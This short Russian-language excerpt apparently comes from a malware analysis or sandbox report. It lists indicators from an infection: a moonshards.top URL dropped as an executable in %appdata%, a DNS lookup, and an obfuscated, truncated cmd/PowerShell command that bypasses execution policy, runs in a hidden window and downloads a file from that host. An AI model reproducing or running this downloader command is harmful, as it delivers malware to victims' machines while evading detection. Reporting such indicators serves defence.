Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwERsh^e^ll.^EX^E^ -eX^EcUTionP^O^L^I^Cy^ b^Ypass -^nOPro^FILe -windO^WStyle H^I^D^DeN ^(^N^e^w-o^bjE^CT sY^steM.^neT.W^eBc^LIE^NT).D^o^W^nLo^a^dFI^le('http://moonshards....
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /C "pOwERsh^e^ll.^EX^E^ -eX^EcUTionP^O^L^I^Cy^ b^Ypass -^nOPro^FILe -windO^WStyle H^I^D^DeN ^(^N^e^w-o^bjE^CT sY^steM.^neT.W^eBc^LIE^NT).D^o^W^nLo^a^dFI^le('http://moonshards....' (со скрытым окном)